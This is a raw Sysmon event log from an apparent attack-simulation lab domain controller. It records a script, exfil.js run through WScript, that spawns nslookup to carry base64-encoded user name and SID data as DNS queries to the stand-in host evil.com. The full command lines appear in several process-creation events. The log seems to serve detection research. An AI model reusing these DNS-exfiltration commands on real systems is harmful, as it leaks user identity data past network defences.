10341000x8000000000000000208904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9B43-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-18EB-629A-9943-000000005F02}78887904C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-9B43-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-18EB-629A-9B43-000000005F02}5592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9943-000000005F02}7888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmara.tmp 2>&1 10341000x8000000000000000208898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.512{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9A43-000000005F02}6064C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.512{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9A43-000000005F02}6064C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.512{2E1864BB-18EB-629A-9A43-000000005F02}60643336C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9943-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.497{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9A43-000000005F02}6064C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9943-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-18E0-629A-6742-000000005F02}39767568C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9943-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.491{2E1864BB-18EB-629A-9943-000000005F02}7888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmara.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.481{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuhyp.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000208886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50663- 354300x8000000000000000208885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-50663-false127.0.0.1-53domain 354300x8000000000000000208884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-50662-false127.0.0.1-53domain 354300x8000000000000000208883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50662- 354300x8000000000000000208882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-50662-false127.0.0.1-53domain 354300x8000000000000000208881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-50661-false127.0.0.1-53domain 354300x8000000000000000208880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50661- 354300x8000000000000000208879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.824{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-50661-false127.0.0.1-53domain 10341000x8000000000000000208878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-18EB-629A-9743-000000005F02}36445432C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9843-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9843-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.443{2E1864BB-18EB-629A-9643-000000005F02}75525252C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-9843-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.447{2E1864BB-18EB-629A-9843-000000005F02}5036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9643-000000005F02}7552C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuhyp.tmp 2>&1 10341000x8000000000000000208870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.412{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9743-000000005F02}3644C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.412{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9743-000000005F02}3644C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.412{2E1864BB-18EB-629A-9743-000000005F02}36445432C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9643-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.396{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9743-000000005F02}3644C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 